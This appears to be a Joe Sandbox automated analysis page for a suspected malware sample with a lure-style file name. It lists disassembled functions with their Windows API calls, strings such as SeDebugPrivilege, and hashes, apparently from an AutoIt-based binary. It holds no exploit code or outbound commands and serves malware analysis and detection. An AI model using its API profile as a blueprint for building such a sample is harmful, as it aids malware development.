Opcode ID: c817e47f33ff8a6b8ca0a23c5ea3e50006997b1f79c72d2593969e851cd4b645
Instruction ID: 657619b89fc55e2175d9f31538e22b590ebd94cc7919a0db54dfdeaa3d81ed5a
Opcode Fuzzy Hash: c817e47f33ff8a6b8ca0a23c5ea3e50006997b1f79c72d2593969e851cd4b645
Instruction Fuzzy Hash: 9D71D130900245DFCF218F65C891AFA3BF6FF49360F1846AAED555A2A6C771C886DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

Part of subcall function 00BB2344: GetCursorPos.USER32(?), ref: 00BB2357
Part of subcall function 00BB2344: ScreenToClient.USER32(00C767B0,?), ref: 00BB2374
Part of subcall function 00BB2344: GetAsyncKeyState.USER32(00000001), ref: 00BB2399
Part of subcall function 00BB2344: GetAsyncKeyState.USER32(00000002), ref: 00BB23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C3C2E4
ImageList_EndDrag.COMCTL32 ref: 00C3C2EA
ReleaseCapture.USER32 ref: 00C3C2F0
SetWindowTextW.USER32(?,00000000), ref: 00C3C39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C3C3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C3C48F

Strings

@GUI_DRAGFILE, xrefs: 00C3C424
@GUI_DROPID, xrefs: 00C3C3E1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 7dc1054598d85c4e179472d1de40a0f08908da513ccce0f921ccb7e0d69e6761
Instruction ID: 08aa35cb8ebb669d0b0e52cb2b9389e30da3cf12c3d7ff58f65b928904375acc
Opcode Fuzzy Hash: 7dc1054598d85c4e179472d1de40a0f08908da513ccce0f921ccb7e0d69e6761
Instruction Fuzzy Hash: 50519E70214304AFDB14EF24C896FBE77E5EB88310F10892DF565972E2CB71A955CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C28F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C3F910), ref: 00C2903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C3F910), ref: 00C29071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C291EB
SysFreeString.OLEAUT32(?), ref: 00C29215

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 918c37de5db2695e0d9fe4e5dde7a59b60d3d1d066dfd7c8fd35e6a7358c2f60
Instruction ID: 260e811c2307b9ec86aae00363b66c7b1b44c1ebdb90783c520b4fc3ff2b7165
Opcode Fuzzy Hash: 918c37de5db2695e0d9fe4e5dde7a59b60d3d1d066dfd7c8fd35e6a7358c2f60
Instruction Fuzzy Hash: A1F14D71A00219EFDF14DF94D888EAEB7B9FF49314F108499F515AB2A1CB31AE46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C2F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C2FD90
CloseHandle.KERNEL32(?), ref: 00C2FDBF
CloseHandle.KERNEL32(?), ref: 00C2FE36

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 050e2f9015f12730791a6d680762aa2b854bc35dcac0001d1313c86f90738a5e
Instruction ID: 275dfd63228a1283f6df408f88845513331280df0dba3dbd3318c09d8a068fd8
Opcode Fuzzy Hash: 050e2f9015f12730791a6d680762aa2b854bc35dcac0001d1313c86f90738a5e
Instruction Fuzzy Hash: AAE1BF31204215DFCB25EF24D481B6ABBF1AF85310F1489BDF8998B2A2DB70DD46DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C14F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C138D3,?), ref: 00C148C7

Part of subcall function 00C148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C138D3,?), ref: 00C148E0

Part of subcall function 00C14CD3: GetFileAttributesW.KERNEL32(?,00C13947), ref: 00C14CD4

lstrcmpiW.KERNEL32(?,?), ref: 00C14FE2
_wcscmp.LIBCMT ref: 00C14FFC
MoveFileW.KERNEL32(?,?), ref: 00C15017

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 7f9dd0aa973ddd4bbffc2723bcf937718d4407783e7305cbaf1bf32e83769521
Instruction ID: 53488dc073c51c138513c995a80b2d6cc6e4c1bbfd45e9e05e9fd0b2cc460f8d
Opcode Fuzzy Hash: 7f9dd0aa973ddd4bbffc2723bcf937718d4407783e7305cbaf1bf32e83769521
Instruction Fuzzy Hash: 665186B24087859BC724EBA0CC819DFB3ECAF85300F10092FF199D3191EF75A6899766

Uniqueness

Uniqueness Score: -1.00%

Function 00C388B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C3896E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: df0e84dfaf1e29eeed8a58e1627d523c3485f7cfade1c892d52247035f7267d9
Instruction ID: 9e166e81356cf51125dfa9f949df4f6996c7cab273240ca12d1002c21552df93
Opcode Fuzzy Hash: df0e84dfaf1e29eeed8a58e1627d523c3485f7cfade1c892d52247035f7267d9
Instruction Fuzzy Hash: E551C430620308BFDF259F25CC85BAD3BA5FB05350F604516F925E62E1DF75AA8CAB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BEC547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BEC569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BEC581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BEC59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BEC5C0
DestroyIcon.USER32(00000000), ref: 00BEC5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BEC5EC
DestroyIcon.USER32(?), ref: 00BEC5FB

Part of subcall function 00C3A71E: DeleteObject.GDI32(00000000), ref: 00C3A757

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 5486ded6f2cb56f200b4868e2bffe3374c6595816350a7311be64b2136218797
Instruction ID: f9e908d7e84f6bdc9f42619ad32d47159e0e62d83f8e8c432c4376ff3fd1a2ac
Opcode Fuzzy Hash: 5486ded6f2cb56f200b4868e2bffe3374c6595816350a7311be64b2136218797
Instruction Fuzzy Hash: 7B515970A10609AFDB24DF25CC86FBA3BF5EB58350F104568F946972A0DBB0ED91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C09B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0AE77
Part of subcall function 00C0AE57: GetCurrentThreadId.KERNEL32 ref: 00C0AE7E
Part of subcall function 00C0AE57: AttachThreadInput.USER32(00000000,?,00C09B65,?,00000001), ref: 00C0AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C09B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C09B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C09B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C09B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C09BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C09BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C09BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C09BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C09BDD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 88723c908d3ccaeb4c5eef288054a97fc6f4339b0e7c95ac5d6d034c7e833f24
Instruction ID: 01d83ff501b093f9d38713e912f4c3281b81c243ee5279cc7cc196890e65d2f9
Opcode Fuzzy Hash: 88723c908d3ccaeb4c5eef288054a97fc6f4339b0e7c95ac5d6d034c7e833f24
Instruction Fuzzy Hash: 5111E171960618BFF6106B60EC8AF6E7B2DEB4C761F100829F254AB0E0C9F25C11DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C08E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C08A84,00000B00,?,?), ref: 00C08E0C
HeapAlloc.KERNEL32(00000000,?,00C08A84,00000B00,?,?), ref: 00C08E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C08A84,00000B00,?,?), ref: 00C08E28
GetCurrentProcess.KERNEL32(?,00000000,?,00C08A84,00000B00,?,?), ref: 00C08E30
DuplicateHandle.KERNEL32(00000000,?,00C08A84,00000B00,?,?), ref: 00C08E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C08A84,00000B00,?,?), ref: 00C08E43
GetCurrentProcess.KERNEL32(00C08A84,00000000,?,00C08A84,00000B00,?,?), ref: 00C08E4B
DuplicateHandle.KERNEL32(00000000,?,00C08A84,00000B00,?,?), ref: 00C08E4E
CreateThread.KERNEL32(00000000,00000000,00C08E74,00000000,00000000,00000000), ref: 00C08E68

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0eba72f0bc665fea9413b5f907df8f461d79fbf92044f3b0ecd04b60e557365d
Instruction ID: b9f50c2ae92e54db822c0a372f0a959cbf0592adaeecf2d0ee9ecac97a2a1d62
Opcode Fuzzy Hash: 0eba72f0bc665fea9413b5f907df8f461d79fbf92044f3b0ecd04b60e557365d
Instruction Fuzzy Hash: 1B01BBB5650308FFE710ABA5EC4DF6F3BACEB89711F004825FA05DB1A1CA719805DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C29428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C2947C
VariantInit.OLEAUT32(?), ref: 00C2954D
VariantInit.OLEAUT32(?), ref: 00C2964E
VariantClear.OLEAUT32(?), ref: 00C29658
VariantClear.OLEAUT32(?), ref: 00C296B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00C29631
Null Object assignment in FOR..IN loop, xrefs: 00C294DD, 00C2960B, 00C296C3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: bd85234c41d5b3bfba68b0babd3728689c305cbb62e221728060316675b2fb15
Instruction ID: a50e62615986d7358213ebede4bcc9418bfec8f3357bb6305afce2c9725e53f3
Opcode Fuzzy Hash: bd85234c41d5b3bfba68b0babd3728689c305cbb62e221728060316675b2fb15
Instruction Fuzzy Hash: 9291B171A00229AFDF24DFA5E848FAEB7B8EF45710F10856DF515AB280D7709A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C29A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00C07652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?,?,00C0799D), ref: 00C0766F
Part of subcall function 00C07652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?), ref: 00C0768A
Part of subcall function 00C07652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?), ref: 00C07698
Part of subcall function 00C07652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?), ref: 00C076A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C29B1B
_memset.LIBCMT ref: 00C29B28
_memset.LIBCMT ref: 00C29C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C29C97
CoTaskMemFree.OLE32(?), ref: 00C29CA2

Strings

NULL Pointer assignment, xrefs: 00C29CF0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 10d655201f96ee12dd566958a5bc8615379827616796b4e96f5aa0be7ff7dd97
Instruction ID: 3351eaa15b316610133fd72bf4cd719f5f35ddc1ce62ca054932a00d51f38112
Opcode Fuzzy Hash: 10d655201f96ee12dd566958a5bc8615379827616796b4e96f5aa0be7ff7dd97
Instruction Fuzzy Hash: BB913871D00229EBDB10DFA5DC85ADEBBB8FF08710F20416AF519A7281DB719A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C37093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C370A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C370C1
_wcscat.LIBCMT ref: 00C3711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C37133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C37161

Strings

SysListView32, xrefs: 00C37065

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 34616ee801aed7263ca20839c738f7fd7c7c77ff4bc3657b60c049f762729b38
Instruction ID: e1ed17538f7d042e98a775a5c0e808b1bd6b0556621d58d2c141eec354194e61
Opcode Fuzzy Hash: 34616ee801aed7263ca20839c738f7fd7c7c77ff4bc3657b60c049f762729b38
Instruction Fuzzy Hash: 664191B1914308ABDB319FA4CC85BEE77F8EF08350F10096AF598E7291D6719D858B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C13E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00C13EB6
Part of subcall function 00C13E91: Process32FirstW.KERNEL32(00000000,?), ref: 00C13EC4
Part of subcall function 00C13E91: CloseHandle.KERNEL32(00000000), ref: 00C13F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2ECB8
GetLastError.KERNEL32 ref: 00C2ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2ED77
GetLastError.KERNEL32(00000000), ref: 00C2ED82
CloseHandle.KERNEL32(00000000), ref: 00C2EDB7

Strings

SeDebugPrivilege, xrefs: 00C2ECD6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2a92dd8432419e9d530fcd618235a41b5b9e292a9bd2b75dfe1225bf83e833a1
Instruction ID: c5f328adef16c0969ed5f4123a8a84f3858ae42501ce154c743576e208ee4b5d
Opcode Fuzzy Hash: 2a92dd8432419e9d530fcd618235a41b5b9e292a9bd2b75dfe1225bf83e833a1
Instruction Fuzzy Hash: B941DE712002119FDB10EF24DC95FBEB7E1AF40714F0884ACF946AB2D2CBB4A904DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C13226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C132C5

Strings

blank, xrefs: 00C13247
info, xrefs: 00C13266
warning, xrefs: 00C132AE
question, xrefs: 00C1327E
stop, xrefs: 00C13296

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7de20a7f1e4200bc6dc1eecf2f08b5c2e679104dce5a28eba440ceec988ab883
Instruction ID: 143b92d12b2cb7bac188cf0bdecbb3b327a8c33028b138c101d8517207242ec7
Opcode Fuzzy Hash: 7de20a7f1e4200bc6dc1eecf2f08b5c2e679104dce5a28eba440ceec988ab883
Instruction Fuzzy Hash: 69113831248386BAA7116A55DC82DEAB3DCDF1B778F10003AF504B62C3E6725B8059A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C14534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C1454E
LoadStringW.USER32(00000000), ref: 00C14555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C1456B
LoadStringW.USER32(00000000), ref: 00C14572
_wprintf.LIBCMT ref: 00C14598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C145B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C14593

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: e49de757dfa980f2c2dd1d38f6bd800e95e99d63e5ec212ef2129415c2322b5f
Instruction ID: e04a18afe9f62fa2ceb05d899993b9ce2f3b5d1e00716fa96d62e45b3f214755
